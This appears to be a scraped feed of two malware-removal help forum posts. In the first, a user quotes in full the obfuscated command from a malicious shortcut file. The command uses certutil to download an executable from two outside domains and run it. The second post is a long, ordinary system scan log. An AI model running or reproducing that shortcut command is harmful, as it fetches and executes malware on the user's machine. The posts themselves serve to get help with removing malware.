.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…

C:\Windows\svchost.exe keeps reappearing after reboot. - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 23 Apr 2020 07:15 AM PDT

Hey there,

I have been having trouble with this virus for the past few days. I was able to stop it from running on startup, but it keeps reappearing, or being downloaded by another software. I have multiple of these svchost.exe files, and don't know which ones are legit and which ones are fake. If you see anything made by Synapse, I trust it and do not believe that it is causing this problem. Here are the FRST scan notes:

FRST.txt:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-04-2020
Ran by ntbea (administrator) on DESKTOP-O22KKMM (Micro-Star International Co., Ltd. MS-7B79) (23-04-2020 10:14:02)
Running from C:\Users\ntbea\Downloads
Loaded Profiles: ntbea (Available Profiles: ntbea)
Platform: Windows 10 Pro Version 1909 18363.778 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Advanced Micro Devices, Inc. -> ) C:\Program Files\AMD\Performance Profile Client\RyzenMaster\AUEPRyzenMasterAC.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Program Files\AMD\Performance Profile Client\AUEPUF.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(A-Volute -> Nahimic) C:\Windows\System32\NahimicService.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <65>
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12004.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.120.4062.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.120.4062.0_x64__8wekyb3d8bbwe\GameBarFT.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.120.4062.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\regedit.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2004.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2004.6-0\NisSrv.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\Dragon Center\APP_Dragon_Center_Keeper.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\Dragon Center\DragonCenter_Service.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LEDKeeper2.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LightKeeperService.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Dragon Center\Nahimic\NahimicMonitorX64.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Dragon Center\StorageMonitor\StorageMonitor.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\Dragon Center\CC_Engine_x64.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Windows\SysWOW64\muachost.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646776 2020-03-12] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [TeamsMachineUninstallerLocalAppData] => %LOCALAPPDATA%\Microsoft\Teams\Update.exe --uninstall --msiUninstall --source=default
HKLM-x32\...\Run: [TeamsMachineUninstallerProgramData] => %ProgramData%\Microsoft\Teams\Update.exe --uninstall --msiUninstall --source=default
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [OneDrive] => C:\Users\ntbea\AppData\Local\Microsoft\OneDrive\OneDrive.exe [1620840 2020-04-22] () [File not signed]
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [Discord] => C:\Users\ntbea\AppData\Local\Discord\app-0.0.306\Discord.exe [90950968 2020-02-24] (Discord Inc. -> Discord Inc.)
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [LonelyScreen] => C:\Program Files (x86)\LonelyScreen\lonelyscreen.exe [23353856 2017-10-24] () [File not signed]
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [31740816 2020-04-22] (Epic Games Inc. -> Epic Games, Inc.)
GroupPolicy: Restriction ? <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0122B8E8-1A76-45F6-A0E2-2439E169B5A2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {01E0BE79-3E8F-4DA1-A83A-95460B12870A} - System32\Tasks\MSISW_Host => C:\Windows\SysWOW64\muachost.exe [1692840 2015-08-18] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
Task: {1C80059D-E619-4252-A93D-A789C733EF85} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2C1D5358-B6D8-4CC7-8BB4-0D7193316C8A} - System32\Tasks\Microsoft\VisualStudio\Updates\UpdateConfiguration_S-1-5-21-230749707-3925018352-439227168-1001 => C:\program files (x86)\microsoft visual studio\installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\VSIXConfigurationUpdater.exe [23456 2020-04-22] (Microsoft Corporation -> Microsoft)
Task: {4339704C-0009-41D9-8ED7-20382AC55B9A} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe
Task: {46524036-2947-40C9-8158-0D56FFFCB76D} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {46DDEA2E-F05D-40F1-A7A6-01659F29DDA3} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe
Task: {67783823-CB45-42F5-AB22-13127718967A} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1628160 2020-03-17] (Advanced Micro Devices, Inc.) [File not signed]
Task: {8F6E9D79-9ED9-41E6-9512-ED22FBA884FF} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {A80F4D74-694E-4100-95E9-F6C01AB6D906} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1628160 2020-03-17] (Advanced Micro Devices, Inc.) [File not signed]
Task: {B0D174FB-65BC-46B1-B5CF-0E0F1DC95285} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe
Task: {B78168F0-1C87-4361-8BD8-602D99A159C4} - System32\Tasks\StartCNBM => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {C41C7087-81F5-4985-BEE5-F46EAF04FB64} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {DA5A666D-55C4-4410-A58F-0836B3B35F8C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe
Task: {E896660C-395C-41AA-8D59-8D1FE2854CC4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F46CD53C-682D-498B-961A-5BD05A52982F} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe [65440 2020-04-22] (Microsoft Corporation -> Microsoft)
Task: {FBBE066C-20B8-44A5-948C-47882D09300D} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [1628160 2020-03-17] (Advanced Micro Devices, Inc.) [File not signed]
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 64.233.217.2 64.233.217.3
Tcpip\..\Interfaces\{7eef5dca-5587-4734-80b1-2b5d0da35f9d}: [DhcpNameServer] 64.233.217.2 64.233.217.3
Internet Explorer:
==================
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll => No File
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL => No File
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\ssv.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL => No File
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\jp2ssv.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL No File
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\dtplugin\npDeployJava1.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\plugin2\npjp2.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [No File]
CHR DefaultProfile: Profile 4
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default [2020-04-23]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-08-26]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-08-26]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-08-26]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-08-26]
CHR Extension: (Honey) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmnlcjabgnpnenekpadlanbbkooimhnj [2020-04-03]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-04-06]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-08-26]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-20]
CHR Extension: (Roblox+) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfbnmfgkohlfclfnplnlenbalpppohkm [2020-04-14]
CHR Extension: (TubeBuddy) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\mhkhmbddkmdggbhaaaodilponhnccicb [2020-04-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-08-26]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-20]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-04-20]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1 [2020-04-23]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-09-15]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2019-09-15]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-09-15]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-09-15]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-09-15]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-21]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-04-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-08]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-09-15]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-21]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2 [2020-02-19]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-11-05]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2019-11-05]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-11-05]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-11-05]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-11-05]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-02-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-11-05]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-11-05]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-02-17]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3 [2020-03-25]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-02-17]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2020-02-17]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-02-17]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-02-17]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-02-17]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-02-17]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-02-17]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-24]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4 [2020-04-23]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-18]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-18]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-18]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-18]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-18]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-21]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-18]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-18]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-21]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5 [2020-03-29]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-24]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-24]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-24]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-24]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-24]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-24]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-24]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-24]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6 [2020-04-20]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-04-18]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\aohghmighlieiainnegkcijnfilokake [2020-04-18]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-04-18]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-04-18]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-04-18]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-20]
CHR Extension: (Roblox+) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\jfbnmfgkohlfclfnplnlenbalpppohkm [2020-04-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-18]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-04-18]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-18]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\System Profile [2020-04-20]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AMD External Events Utility; C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atiesrxx.exe [524712 2020-03-18] (Advanced Micro Devices, Inc. -> AMD)
